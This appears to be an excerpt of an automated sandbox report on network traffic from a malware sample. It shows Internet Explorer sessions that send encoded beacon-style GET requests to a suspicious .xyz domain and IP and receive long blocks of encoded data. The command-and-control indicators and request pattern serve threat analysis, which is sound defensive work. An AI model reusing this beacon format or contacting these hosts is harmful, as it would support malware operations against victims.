Jul 6, 2021 14:31:02.145934105 CEST	10937	IN	Data Raw: 64 50 45 59 6d 75 63 65 58 56 75 2b 65 73 4c 50 47 68 2b 6e 77 61 65 6f 59 61 39 46 30 52 52 75 50 53 30 50 71 6a 70 6d 51 77 7a 35 49 4f 74 72 4d 30 31 66 70 71 51 30 67 4a 6e 56 31 73 72 4e 53 33 7a 4d 65 70 59 35 6b 58 67 57 56 44 37 6f 64 2b Data Ascii: dPEYmuceXVu+esLPGh+nwaeoYa9F0RRuPS0PqjpmQwz5IOtrM01fpqQ0gJnV1srNS3zMepY5kXgWVD7od+CbrqOwkR/oeaJwkXtQawDvDLXVjfJwBFfn/9z8ZKBvj5ql3TqU+OXaaM2TEnn8sirqG9ZSopwcY09CSMCNEM25pEDDXHyka8ktDmpOhVq1tEW3/uPqk2piO0hKU3aPiY+e8bshNXDXXiBL0e3hF9fArYaTroGybTW
Jul 6, 2021 14:31:02.145951986 CEST	10938	IN	Data Raw: 39 52 69 52 45 66 39 43 67 46 56 6e 68 70 39 4c 79 6a 2f 37 72 50 4c 75 2f 59 4f 41 4b 39 4f 42 65 58 2b 54 43 6d 74 68 6a 39 54 48 51 44 62 6d 36 41 45 48 58 48 35 4b 6c 34 50 59 58 73 6d 63 4c 46 6d 79 6a 39 4d 62 4e 63 36 42 73 37 69 51 46 4b Data Ascii: 9RiREf9CgFVnhp9Lyj/7rPLu/YOAK9OBeX+TCmthj9THQDbm6AEHXH5Kl4PYXsmcLFmyj9MbNc6Bs7iQFKFzGWFcamhuY/YF/7bKjK1s7JRXcdUGiSMQXVC2+ydj48vE+TgqUgt3LLwMVwm6zsBUlKNiqzOnDhITfuYYHqYPy5RfC5dNzEnVcWLINxRdIwpWSMDjosAxHYJ6z5J9yBaiQKzqDc83j8nSRFwMi/ya7pJoHk41szF
Jul 6, 2021 14:31:02.145970106 CEST	10939	IN	Data Raw: 70 6c 39 2b 37 5a 57 31 35 74 58 63 45 79 46 62 52 73 64 67 30 54 63 56 6c 7a 7a 35 45 4a 65 64 48 73 78 58 43 78 4b 77 73 2b 75 37 42 6f 43 6c 46 68 2b 59 4e 6d 68 46 39 44 2b 77 72 78 44 43 48 63 65 74 77 32 47 5a 31 49 2f 32 41 55 35 45 56 2b Data Ascii: pl9+7ZW15tXcEyFbRsdg0TcVlzz5EJedHsxXCxKws+u7BoClFh+YNmhF9D+wrxDCHcetw2GZ1I/2AU5EV+g+SETloCBLto19Crb5vVqDz6/QVn2Kuyw3n7rqUuMBQprwF+wMgjbtbZKWQmvjxUkqve0LOpwcO3eYFgmYz9RFSkR6eCsTGTEA5HWR4oBVx0JosioSwKVmVjKacKHUDlsYWnGKr8QM40rg1JbkpSUZ2annA+GPee2
Jul 6, 2021 14:31:02.145987988 CEST	10941	IN	Data Raw: 6e 52 72 54 31 51 5a 4b 63 38 43 42 4a 50 2f 62 73 4b 75 65 64 77 75 43 36 46 6c 54 46 72 32 47 76 34 41 73 4c 6a 53 30 47 61 51 57 78 5a 54 4b 59 68 41 63 64 71 33 30 35 58 42 5a 37 6b 61 33 39 45 64 6e 68 4e 57 52 77 46 2b 77 5a 66 5a 2b 2b 4e Data Ascii: nRrT1QZKc8CBJP/bsKuedwuC6FlTFr2Gv4AsLjS0GaQWxZTKYhAcdq305XBZ7ka39EdnhNWRwF+wZfZ++N4+L5wafyW44f5c24ppMIjUNcb2b2kx5GtPXiZ0X9/PJ8W5qKPlE8aNDdAINLxYUGlvFx8RkRsU6fWzM6rOKW1QpveU81D3HqBBUWMQr5hYrRc4E8X7r/DalFZinLcVJbupgy6EpMBhAL8+Q1jIw5JsG21NXDBSTQJ
Jul 6, 2021 14:31:02.146045923 CEST	10942	IN	Data Raw: 34 63 58 67 48 6b 39 59 4d 65 2b 63 55 46 53 77 72 44 2f 2b 38 37 44 58 66 35 59 46 44 62 30 46 7a 68 45 53 6b 51 55 7a 4d 34 30 46 45 45 52 2f 6e 4c 42 63 77 64 6b 38 6e 4f 45 45 74 68 43 43 49 32 5a 48 48 67 5a 48 31 39 58 57 69 6c 75 76 67 43 Data Ascii: 4cXgHk9YMe+cUFSwrD/+87DXf5YFDb0FzhESkQUzM40FEER/nLBcwdk8nOEEthCCI2ZHHgZH19XWiluvgC5Yy2b3vU4Zkxi6licf0HHG3OhcPEBKQZPaT09yhKrXUZhWhKJ3K//SICSWhyiRZv1q2bbJC/eJj9SaYG3v2oeC82bkNPi7xA/F3cOqIfgQPXXRdKUheZDaZd9aD7yC3xGy5CINHFPNHBkxhh4WvlB87hj4yo0WBhp
Jul 6, 2021 14:31:02.146064043 CEST	10943	IN	Data Raw: 63 56 72 69 68 7a 32 2f 69 4c 65 5a 38 4b 36 37 4c 64 4b 55 61 64 76 6b 5a 42 56 6f 55 74 6b 4d 65 42 78 6f 71 44 68 76 36 73 56 79 2f 75 6b 4b 32 74 4a 35 4d 55 66 4f 39 76 48 58 69 30 33 48 37 4f 43 74 35 65 47 75 58 41 31 50 73 7a 32 77 36 57 Data Ascii: cVrihz2/iLeZ8K67LdKUadvkZBVoUtkMeBxoqDhv6sVy/ukK2tJ5MUfO9vHXi03H7OCt5eGuXA1Psz2w6WSl4zjnD9KBaBC5vxnH2xYp4sKkBzrAlSiB0hD4xZaXiizkIr9AZ268XkAojA1/rTaSXPHfZBIDCErsVQy95w55MXAqqTOKT0qHf9VX+n3tQ9guHT+7A5j4SjSHjV74bt+0eT2VnS0pVjE5YXAFkMGpBVlwGZ1WRcn
Jul 6, 2021 14:31:02.146080017 CEST	10945	IN	Data Raw: 47 56 7a 4a 6b 4c 6a 4c 34 70 49 4b 54 36 45 36 6f 38 41 36 4d 75 76 30 69 65 75 31 7a 38 4c 76 69 64 30 6c 32 6b 57 79 56 42 70 51 6b 57 56 61 33 73 35 6d 64 53 2b 4c 42 41 6b 49 79 56 36 57 4b 41 2b 59 52 6d 53 79 4b 72 74 6b 6c 6f 71 56 62 4d Data Ascii: GVzJkLjL4pIKT6E6o8A6Muv0ieu1z8Lvid0l2kWyVBpQkWVa3s5mdS+LBAkIyV6WKA+YRmSyKrtkloqVbMFwodpAOW/17xA+ABmBP4QRre1Bl+WwYgmK6mz5whN5Jn0FXZcOJB7HeBB218JKD2uCM5s/sMqwYO980SaHLq93uHuGBv/c0hVmTq2rb8jLHOb5xWOdjcRrWgruDJIZEJozZN26qQC3KaUJnM97d647k2Y+9tX2dLD
Jul 6, 2021 14:31:02.146116018 CEST	10946	IN	Data Raw: 72 47 68 62 53 59 4b 55 42 41 62 59 7a 35 6e 68 34 56 2f 4f 72 6a 71 69 70 4b 45 74 53 78 42 6c 64 30 50 55 68 4c 61 56 2b 79 43 6b 73 74 45 6f 79 48 37 32 48 70 43 42 33 64 47 4d 61 4c 2b 42 48 6f 2f 62 30 33 31 49 4c 34 2f 61 48 62 62 39 2b 67 Data Ascii: rGhbSYKUBAbYz5nh4V/OrjqipKEtSxBld0PUhLaV+yCkstEoyH72HpCB3dGMaL+BHo/b031IL4/aHbb9+gcn8tMj8SxjCDTVgPdfSOnaJVT4tEA2TcN9hLdu38YA6gWMi0V6QhLhI+qjY09dNXDav+CVarPbgfxA+7/FNtxe9eDsCMEt2fMc532NEC9aC7r/oZJsAnKMAOHGAP6wOFji0jlT1djOT9rZGS9/N5mfIQBGJlOEFgW
Jul 6, 2021 14:31:02.182791948 CEST	10948	IN	Data Raw: 53 73 34 6d 53 6d 61 6e 75 7a 6c 7a 6e 36 4e 47 71 66 48 63 35 57 62 67 38 56 6d 65 43 54 55 4e 49 78 35 38 50 74 68 56 5a 47 6e 2f 4d 54 48 6a 54 33 48 37 54 2b 46 35 4d 78 32 5a 66 38 48 6c 36 41 67 4e 43 73 38 37 33 33 75 72 70 4a 6d 56 2b 2f Data Ascii: Ss4mSmanuzlzn6NGqfHc5Wbg8VmeCTUNIx58PthVZGn/MTHjT3H7T+F5Mx2Zf8Hl6AgNCs8733urpJmV+/zFvVB20ClxCA7qbHp5CmusewLKhxaV3Fvr3DtqcGJ4mg2wbTKrD2+obxzC+uJ3ROCnRLYkHF+UPnCdakLarcp9X+idnKSjXVa613r4gI+d4eBOeyaczPaIFGjAtHmfRINSaG44JnaD+RgTyLdAMNUbPE7KLFqRax/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49880	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:07.476458073 CEST	11213	OUT	GET /jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:07.536185026 CEST	11215	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:07 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 61 33 31 34 0d 0a 67 72 57 41 4c 4a 30 41 6f 52 72 79 4d 68 4c 6b 62 34 2b 35 66 4b 46 31 42 54 33 44 6c 56 75 33 6a 75 7a 45 48 61 77 2f 5a 76 53 45 53 6d 51 76 58 51 38 6e 6b 70 30 59 39 52 6b 64 57 67 69 7a 31 69 4f 4b 31 44 38 4e 55 72 39 69 5a 64 73 64 46 72 38 31 4a 6d 70 57 67 39 74 78 6e 64 7a 56 47 54 30 65 36 2b 54 42 59 51 45 66 63 65 50 51 59 6e 6f 75 51 33 6e 45 5a 54 63 44 75 52 54 63 56 56 4b 70 34 4d 76 79 6f 41 45 37 36 67 44 5a 59 5a 62 31 55 37 54 4f 36 67 57 46 35 78 47 61 45 59 44 50 52 68 58 36 4b 75 42 45 44 4c 6e 70 4b 4a 59 4e 78 6e 5a 2f 70 73 6b 35 5a 2f 78 69 72 55 51 75 71 72 35 6e 51 38 64 43 77 62 76 6e 49 61 2f 44 67 44 59 66 35 43 6a 67 64 73 77 6b 67 72 72 48 6f 34 71 30 37 6d 36 41 65 39 6d 42 2b 53 46 34 4c 36 71 4d 35 56 2b 67 77 30 61 33 4c 70 65 4b 54 75 57 53 79 33 31 6c 6f 76 6f 31 38 44 36 63 43 5a 49 66 4e 4d 30 79 4d 73 41 71 51 6a 78 44 57 30 59 61 53 79 56 65 4d 54 6a 75 36 74 76 76 59 79 35 6d 55 62 75 73 61 70 37 57 49 6d 41 57 6d 61 67 48 4b 6e 30 51 43 52 59 52 33 37 64 49 32 6e 73 70 58 31 44 4f 52 73 2b 31 35 51 62 71 62 4c 4f 77 73 67 4c 63 64 66 65 56 36 6b 77 63 48 44 68 64 34 70 4d 4c 4c 70 73 31 71 6c 41 49 53 4f 52 51 52 32 4b 34 44 36 4a 59 6c 38 58 71 31 4f 37 4b 55 67 75 73 4d 2b 72 4d 63 51 6c 39 76 42 6f 45 54 6a 39 70 53 74 68 61 70 39 32 41 6a 6e 52 76 69 7a 32 74 6e 44 2f 32 55 73 72 74 63 30 78 6c 32 5a 34 59 71 37 6d 30 62 6c 7a 59 4d 46 65 36 75 75 61 72 79 65 45 70 4a 64 50 50 42 61 4c 36 77 67 55 7a 39 72 7a 74 58 78 45 70 47 46 53 61 68 72 6c 33 4c 39 73 34 57 2f 36 57 30 66 47 56 4f 7a 6d 61 30 56 56 62 46 61 55 6d 47 32 45 79 51 7a 52 52 66 6f 42 6e 77 56 54 47 6c 76 51 45 31 71 5a 35 73 39 4d 6c 73 2b 53 79 42 6f 31 2f 35 33 68 6b 59 5a 70 31 6e 2f 4a 6a 46 78 6f 46 38 64 44 34 47 6b 77 72 37 4b 61 56 6a 77 35 35 4e 63 56 79 48 72 4d 49 7a 77 6a 45 6a 39 30 42 76 71 31 50 4a 6a 64 78 56 77 79 33 31 58 70 4a 6f 57 54 35 44 68 6e 2f 73 46 44 63 37 33 4f 31 65 59 71 47 58 4f 4a 37 66 73 2f 4e 33 61 62 44 2f 33 65 4b 63 7a 50 2b 73 66 71 70 70 53 77 39 59 67 54 52 6f 53 32 2f 7a 31 6b 71 51 4f 44 55 7a 41 43 75 70 49 34 66 63 52 63 57 43 6e 70 74 38 69 49 4a 45 7a 4d 48 45 39 6f 78 63 33 6e 66 62 67 47 6a 6d 39 6b 69 44 55 78 6a 58 55 79 67 44 61 59 6c 49 44 73 63 2f 45 39 52 51 47 41 4e 4e 6f 4b 45 67 6a 4c 50 45 47 56 73 64 74 57 45 48 63 6f 2b 33 75 34 5a 59 38 33 72 77 79 6e 4e 30 76 61 43 46 4e 4f 36 72 48 35 36 7a 6a 45 49 53 78 48 73 56 6a 6a 61 6e 6d 64 63 47 31 57 61 50 66 48 43 67 33 79 32 68 71 69 6c 54 61 58 46 37 2b 54 76 70 38 76 5a 72 35 4c 75 65 35 69 30 6c 46 53 6c 46 47 62 48 63 59 59 6c 44 44 55 4a 37 51 33 71 6c 6b 70 77 66 74 50 65 53 54 68 6b 30 61 66 65 72 30 47 77 6d 42 6f 47 48 58 73 41 42 51 57 33 79 50 4b 73 4f 61 33 57 37 79 2f 33 6a 79 62 55 53 6f 50 4e 76 4e 72 69 57 46 2f 65 44 30 61 71 63 6f 46 37 41 38 Data Ascii: 4a314grWALJ0AoRryMhLkb4+5fKF1BT3DlVu3juzEHaw/ZvSESmQvXQ8nkp0Y9RkdWgiz1iOK1D8NUr9iZdsdFr81JmpWg9txndzVGT0e6+TBYQEfcePQYnouQ3nEZTcDuRTcVVKp4MvyoAE76gDZYZb1U7TO6gWF5xGaEYDPRhX6KuBEDLnpKJYNxnZ/psk5Z/xirUQuqr5nQ8dCwbvnIa/DgDYf5CjgdswkgrrHo4q07m6Ae9mB+SF4L6qM5V+gw0a3LpeKTuWSy31lovo18D6cCZIfNM0yMsAqQjxDW0YaSyVeMTju6tvvYy5mUbusap7WImAWmagHKn0QCRYR37dI2nspX1DORs+15QbqbLOwsgLcdfeV6kwcHDhd4pMLLps1qlAISORQR2K4D6JYl8Xq1O7KUgusM+rMcQl9vBoETj9pSthap92AjnRviz2tnD/2Usrtc0xl2Z4Yq7m0blzYMFe6uuaryeEpJdPPBaL6wgUz9rztXxEpGFSahrl3L9s4W/6W0fGVOzma0VVbFaUmG2EyQzRRfoBnwVTGlvQE1qZ5s9Mls+SyBo1/53hkYZp1n/JjFxoF8dD4Gkwr7KaVjw55NcVyHrMIzwjEj90Bvq1PJjdxVwy31XpJoWT5Dhn/sFDc73O1eYqGXOJ7fs/N3abD/3eKczP+sfqppSw9YgTRoS2/z1kqQODUzACupI4fcRcWCnpt8iIJEzMHE9oxc3nfbgGjm9kiDUxjXUygDaYlIDsc/E9RQGANNoKEgjLPEGVsdtWEHco+3u4ZY83rwynN0vaCFNO6rH56zjEISxHsVjjanmdcG1WaPfHCg3y2hqilTaXF7+Tvp8vZr5Lue5i0lFSlFGbHcYYlDDUJ7Q3qlkpwftPeSThk0afer0GwmBoGHXsABQW3yPKsOa3W7y/3jybUSoPNvNriWF/eD0aqcoF7A8
Jul 6, 2021 14:31:07.536367893 CEST	11217	IN	Data Raw: 6c 78 63 44 32 47 56 63 61 36 54 4d 71 37 71 45 4a 45 6c 61 34 2b 50 55 76 34 6f 56 47 72 2f 78 32 67 77 72 79 32 69 75 4f 69 67 35 4f 36 2b 72 59 31 6e 53 34 46 74 79 61 54 71 5a 43 48 76 6f 31 6f 78 41 6f 43 36 32 44 62 48 4f 33 50 33 30 42 4c Data Ascii: lxcD2GVca6TMq7qEJEla4+PUv4oVGr/x2gwry2iuOig5O6+rY1nS4FtyaTqZCHvo1oxAoC62DbHO3P30BLghab//RvG9hkoVKtvUlf1dUfd/hFWNGLhQz9wnvaRsWtj0TveHk1mxLCbBq9qT9iZKYtFlcANnmzhxYXKJr7Qh7YnL3wanaF8xRzB0cBHcnYqzEDKRn/+h5NzRMklbkLP9dcsrxNWX2E8FgZrNX99blk+rAt+eSJy
Jul 6, 2021 14:31:07.536400080 CEST	11218	IN	Data Raw: 67 54 58 34 34 41 75 50 4d 36 34 66 56 45 49 4c 78 54 56 49 32 68 78 59 37 4e 44 62 68 6e 53 6d 65 44 70 61 33 65 77 44 38 30 44 33 6c 50 35 72 4f 68 6b 68 38 6e 42 30 67 62 64 35 42 4a 37 72 44 49 73 45 59 72 71 74 4a 72 6b 72 30 74 58 49 33 66 Data Ascii: gTX44AuPM64fVEILxTVI2hxY7NDbhnSmeDpa3ewD80D3lP5rOhkh8nB0gbd5BJ7rDIsEYrqtJrkr0tXI3f76TkOqKK8+XfqzUd6WsZvh07ElCb+UyD65n8N+NDwGOIwt/xp7rtZuunoVrkz+e1KZEHYuxlDgISMWMU3OBX4KOqL3C5T0V//4eYYBcIhnBaag/I9/pQwUJfr4KXB3N4p3P4Pf5cg0+SUGiD0GqNIP/wC1QaLUQrl
Jul 6, 2021 14:31:07.536423922 CEST	11219	IN	Data Raw: 45 6c 4b 71 41 61 43 7a 64 4f 33 64 33 4f 48 73 46 6f 4d 58 4d 51 73 2b 38 64 35 2f 46 78 39 5a 6d 64 71 41 62 75 2f 4a 68 4b 44 48 32 47 31 34 49 36 6f 76 51 58 70 6b 42 34 67 6f 44 65 4b 6c 5a 6e 65 4c 34 4c 48 47 4e 73 57 57 54 46 51 38 64 75 Data Ascii: ElKqAaCzdO3d3OHsFoMXMQs+8d5/Fx9ZmdqAbu/JhKDH2G14I6ovQXpkB4goDeKlZneL4LHGNsWWTFQ8dunZX+zXvxtQ8ZIAm0RdtWSPfmU8H+MqIfvLRq17/X8IWIo73/Oyi0zVXeSHJooo40JIzxNxmboREY/8lyErZvgDhHbXcwmys/MUghOhvpwwlDUkoJTQm+e0YcHyMIMgbBHIPDEIODzlqZ2aYLk/HCSx8zq/DZoODWj
Jul 6, 2021 14:31:07.536451101 CEST	11221	IN	Data Raw: 57 72 79 52 45 2f 4e 30 2b 6b 61 72 77 56 48 45 6e 70 69 5a 63 7a 6a 67 74 51 57 32 7a 4d 46 48 47 50 50 74 33 7a 37 61 65 77 30 46 4c 34 62 68 39 72 44 2b 54 4d 54 69 32 77 54 5a 55 6c 48 4e 4c 41 58 35 4f 72 48 43 78 30 50 4c 54 71 6c 6e 71 41 Data Ascii: WryRE/N0+karwVHEnpiZczjgtQW2zMFHGPPt3z7aew0FL4bh9rD+TMTi2wTZUlHNLAX5OrHCx0PLTqlnqAcOxSiHPN5MS9hyi9JwrV21NTuZkOPBH1kMSxOBiyxgJZmX6M1UvFBNjBmXFjA0yY5hFM9fvaMDA9Bxv6ETkIJbBkoUgzm7hStpnLWD/YBoE30sWHD+WiHtcVoaupUe5XusTrWI1wf4fwK8j3RhESxHcHX8CZb+lED
Jul 6, 2021 14:31:07.536472082 CEST	11222	IN	Data Raw: 35 5a 2b 43 4e 37 6d 73 6b 48 7a 70 79 50 44 4e 75 4c 68 67 48 31 59 44 45 47 65 69 4c 68 32 78 52 48 56 35 78 48 45 48 71 41 35 4e 56 4b 79 38 67 32 35 4e 66 66 6c 36 63 46 6d 4e 56 6f 42 4c 70 30 32 35 73 62 6f 73 61 63 36 75 48 36 6e 4b 39 44 Data Ascii: 5Z+CN7mskHzpyPDNuLhgH1YDEGeiLh2xRHV5xHEHqA5NVKy8g25Nffl6cFmNVoBLp025sbosac6uH6nK9DkEdHaDceK3scDeDcd1bZUYoO/j5tMgB1kOHdsIHILi6/hnW5ceouM8zuyDaL4W/lcEvDLTQucCFvZ7G1XL7fytejcD//xlHJ2EV6QXWLAyFaS2cj1+UgqRmDMtKlBZW16nCYDOdopSItXMfBJVDovsIe4t7xpu/tA
Jul 6, 2021 14:31:07.536493063 CEST	11223	IN	Data Raw: 44 36 71 66 30 6b 75 4e 46 68 4c 75 63 4a 2b 30 50 43 36 74 35 67 6e 5a 34 42 46 45 41 33 58 71 74 4e 31 4e 37 59 49 75 39 48 5a 4b 73 62 39 57 38 72 37 34 30 4a 77 56 6d 55 4b 6d 41 58 66 6e 36 67 62 57 33 6a 57 61 45 4b 71 5a 35 55 4a 35 62 35 Data Ascii: D6qf0kuNFhLucJ+0PC6t5gnZ4BFEA3XqtN1N7YIu9HZKsb9W8r740JwVmUKmAXfn6gbW3jWaEKqZ5UJ5b589F+hAD4qCwoqpOfGiRUsPZOXquWknnUPMh/UMxkG5XygSNHPIlPQf0KBO59FwzPCWCqvM8qAy7JqBzAmwQs0OYppXZCvZM69UaT929q8e42bBdTt5kbfi96lQ7k5soBqFf3veVQEajzauWHinoVxqRJi+OSRAHse
Jul 6, 2021 14:31:07.536511898 CEST	11225	IN	Data Raw: 6a 72 4c 46 44 76 4e 4b 67 6a 49 42 33 76 4e 61 4e 36 4c 7a 6a 59 41 55 64 67 39 6a 39 6d 30 54 68 34 74 4b 2b 73 4d 57 65 43 6e 48 50 42 6c 54 43 7a 77 42 54 79 33 64 72 34 5a 71 37 75 45 66 32 67 54 33 57 61 58 2b 75 51 44 33 31 75 7a 6e 46 39 Data Ascii: jrLFDvNKgjIB3vNaN6LzjYAUdg9j9m0Th4tK+sMWeCnHPBlTCzwBTy3dr4Zq7uEf2gT3WaX+uQD31uznF9UOsircDJQANKO0d82TKV+OaPW/0az5prwH1r3kFXPHqb3YZFmRfocn21t36MUXYNaFR+k14L7CRuWnfSZxkSxAQGsxXtxFOvMPuDSXa+bq4SRZV4kPJQDKUTiCGi8dwdtCnteI2zM+eMz6+TKJalUkPlWkfdZm5gQ
Jul 6, 2021 14:31:07.536534071 CEST	11226	IN	Data Raw: 49 6b 4c 6f 52 4a 67 6d 69 7a 63 64 34 69 36 47 4e 66 71 44 79 38 47 58 79 4c 48 4a 43 71 64 31 73 61 63 4f 32 51 76 77 62 58 59 78 44 4c 38 52 54 53 4c 44 68 7a 2f 4a 55 6b 70 4f 42 35 47 32 44 65 4a 6d 4a 75 38 61 42 72 66 4d 6d 73 33 38 34 53 Data Ascii: IkLoRJgmizcd4i6GNfqDy8GXyLHJCqd1sacO2QvwbXYxDL8RTSLDhz/JUkpOB5G2DeJmJu8aBrfMms384SXz5cBHV5i5Ba+8kAifi1l9/0Dg/MfoeaDzlhOk+o9g49hr/JBwAWj3HoiQowJfLcDm9Elomg8pODpgexMW9sXcUymehnqGz9G1zxS79+sdD4IP8wPtQmEnYLbxtID/Fl09Xn5abf73KLV31gWDkr0OJ20EDwcWczK
Jul 6, 2021 14:31:07.536556959 CEST	11228	IN	Data Raw: 65 74 7a 49 68 35 67 59 63 70 66 57 2f 48 4c 33 63 67 41 36 44 61 72 4e 53 56 75 6d 72 6b 59 67 50 51 44 45 51 36 79 4e 79 68 44 5a 50 64 55 6a 48 61 4d 6d 42 4f 2b 30 47 69 6a 53 51 39 5a 50 69 46 63 68 48 66 36 51 61 70 63 69 53 70 49 45 31 42 Data Ascii: etzIh5gYcpfW/HL3cgA6DarNSVumrkYgPQDEQ6yNyhDZPdUjHaMmBO+0GijSQ9ZPiFchHf6QapciSpIE1BxMU55qQm1QwQKY1xGtx9wSooSO1eApcBb2SybgCzjEfTJoYm2GoxBt+g5E7vxPfCX8Lz2KXylMKTD8bTn2zf2VU/pZtu8FDBW+CahSAvMKto5T+CXe4XUKbcebC1DkR1RUIEntenwJoIob30WZRkvqaWDDKmQLLZp
Jul 6, 2021 14:31:07.573613882 CEST	11229	IN	Data Raw: 64 48 44 76 77 46 55 30 39 77 51 59 54 50 48 6d 64 37 7a 49 58 78 36 74 5a 2b 64 68 6e 4c 4b 70 71 64 6f 51 6c 4a 52 45 50 55 54 43 53 42 61 62 67 50 6b 54 6f 66 79 47 32 61 45 4a 6c 6a 67 68 55 42 5a 57 49 49 52 68 49 4a 71 74 34 63 63 68 77 2f Data Ascii: dHDvwFU09wQYTPHmd7zIXx6tZ+dhnLKpqdoQlJREPUTCSBabgPkTofyG2aEJljghUBZWIIRhIJqt4cchw/qm5g4a34BSbj4qhHspzEAyAtjrK+do97NxAKp0nqqq2kMkdEnNw/LpCY396nFbN8Er0Uh113nBF8rYBZ44JUxy0z/QwOWlAtc1pmui9lyIe2de+SXTIL5voydZlgmZ3tssMh1Bims6Ee/BcLLq6HkHE1ZOP3nrmKs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49882	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:07.509743929 CEST	11214	OUT	GET /jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:07.671403885 CEST	11422	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:07 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 61 35 63 30 0d 0a 54 37 50 43 46 2b 46 31 4a 55 4b 41 54 62 62 73 6b 6e 55 32 76 58 53 4c 57 30 70 45 54 4a 56 69 7a 51 2b 44 68 35 45 4d 66 73 37 78 45 66 79 46 33 4b 48 51 69 53 71 48 7a 55 68 43 2b 65 4f 65 34 78 4f 6d 6b 74 78 46 38 68 6b 49 4e 50 41 79 47 77 74 4c 75 78 6a 7a 51 55 58 30 64 4f 6c 78 52 68 6c 32 49 79 4d 71 6a 6c 52 6b 53 79 56 4f 65 72 75 63 56 6c 49 33 75 36 35 62 70 6a 30 4f 6d 52 76 43 57 47 38 4a 71 2b 4c 33 74 4a 74 4f 76 31 74 42 74 47 5a 58 5a 42 6c 75 79 32 70 34 54 56 54 57 67 70 50 7a 4f 51 77 76 6d 30 72 68 56 73 4f 48 62 78 44 4b 4c 7a 6b 59 36 4d 50 32 52 32 47 70 50 39 78 71 42 52 46 34 67 7a 30 48 74 53 4d 58 6a 77 44 4e 77 71 46 63 49 32 34 46 62 2b 31 2b 64 73 65 35 69 4c 44 66 51 79 42 35 71 37 33 61 6d 39 61 52 67 36 74 75 43 71 65 53 47 50 4e 64 75 30 44 6f 72 43 2b 65 36 35 37 42 6b 32 69 57 66 4b 4e 72 45 4a 47 34 33 76 4a 4e 2b 68 45 30 6f 4c 37 69 76 34 31 4c 50 36 37 33 61 4b 41 35 6c 33 62 49 48 6f 46 77 4c 30 4f 78 37 6a 69 48 37 5a 36 52 4e 61 37 42 2b 38 42 66 6d 34 51 42 66 4e 31 68 30 55 35 75 47 73 65 68 71 78 7a 56 48 33 46 65 44 77 4f 6b 42 7a 75 43 39 6a 62 4a 7a 77 4c 4b 38 61 2b 6a 49 67 51 53 4a 52 6d 4d 54 43 72 32 33 79 67 67 46 4d 42 75 6b 39 34 32 4c 57 52 45 46 4a 79 58 57 32 52 65 47 61 38 61 63 75 79 7a 54 36 55 57 5a 35 68 4f 58 6e 79 58 54 43 46 61 39 48 76 4c 71 72 56 36 41 74 56 6c 78 62 34 46 37 34 49 51 63 79 50 6f 36 4d 4a 2f 58 6c 74 57 52 6e 44 66 55 61 4d 62 6f 4e 6d 51 58 41 70 4c 56 39 49 4a 66 4a 74 36 50 55 37 7a 66 78 59 37 48 46 4d 4c 68 59 49 62 7a 61 61 43 75 63 71 58 57 33 61 77 6b 30 4e 44 31 54 30 6e 36 4e 36 59 35 57 44 44 6f 69 4e 7a 4b 64 51 4a 4b 69 6e 48 2f 4b 73 4b 32 71 2f 30 2b 34 69 53 42 31 53 33 63 50 35 4a 77 31 54 48 77 4f 45 37 74 6b 77 54 71 71 2f 6b 4e 33 65 63 37 64 6d 38 75 47 30 70 4c 64 2b 63 69 4d 6d 42 68 44 41 31 4c 78 69 6c 53 72 6a 36 6d 64 6f 45 70 6f 55 7a 68 51 30 63 49 6b 69 59 7a 6e 4c 49 4f 41 75 4b 4c 4a 76 43 78 39 4b 32 6c 2f 70 58 35 76 68 52 47 45 49 34 57 69 4b 6d 73 33 34 4e 76 78 44 77 31 42 72 70 70 65 48 66 71 36 6d 35 62 5a 4a 2b 6a 47 6e 57 51 33 56 54 43 39 68 70 2b 7a 62 30 6b 50 51 41 4a 38 61 6f 6d 73 